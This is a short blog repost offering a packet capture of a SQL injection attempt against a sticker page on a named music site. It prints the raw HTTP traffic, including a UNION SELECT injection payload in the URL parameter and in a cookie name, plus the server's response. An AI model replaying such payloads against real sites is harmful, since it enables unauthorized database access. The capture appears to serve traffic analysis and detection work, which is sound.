Download Capsule Sticker SQL Injection PCAP : stickersqli
2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
.. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
Host: www.musicza.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: st1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*=1531fbf68f1f62ccb7b88e9ed77ce518; st1=1531fbf68f1f62ccb7b88e9ed77ce518; st=1531fbf68f1f62ccb7b88e9ed77ce518; PHPSESSID=c1f052c9ac5e264c7b3e29354a9c25cf; _cbclose=1; _cbclose41266=1; _uid41266=7981BF9C.1; _ctout41266=1; verify=test; testcookie=enabled; visit_time=23
2009-01-01 09:30:20.575264 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], ack 820, win 7371, length 0
.. v.,.!E..([email protected]…….u….P.S…..r/.P…(…..
2009-01-01 09:30:20.593702 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], seq 1421:2841, ack 820, win 7371, length 1420: HTTP
.. v…!E…[email protected]…….u….P.S…e.r/.P…_…ction MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
function setsmile(what)
{
document.Postcomment.CommentText.value = document.Postcomment.elements.CommentText.value+” “+what;
document.Postcomment.CommentText.focus();
}
function PopupPic(sPicURL) {
window.open( “popup.html?”+sPicURL, “”,
“resizable=1,HEIGHT=200,WIDTH=200”);
}
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//–>
2009-01-01 09:30:20.595004 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [.], ack 1, win 65535, options [nop,nop,sack 1 {1421:2841}], length 0 .. v.6.!E..4..@…..u……..S.P.r/……………. 2009-01-01 09:30:20.595759 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], seq 1:1421, ack 820, win 7371, length 1420: HTTP: HTTP/1.1 200 OK .. v…!E…[email protected]…….u….P.S…..r/.P…….HTTP/1.1 200 OK Date: Thu, 01 Jan 2009 13:59:20 GMT Server: Apache/2.0.52 (CentOS) X-Powered-By: PHP/4.3.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: st1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*=1531fbf68f1f62ccb7b88e9ed77ce518; expires=Thu, 01-Jan-2009 14:59:20 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=TIS-620 214b |
|
....... | ....... |
......... |
........ |
............ |
.......... |
...... |
....... |
............. |
......... |
.... |
........... |
........ |
|
This post first appeared on Computer Security.org - CyberSecurity News, Inform, please read the originial post: here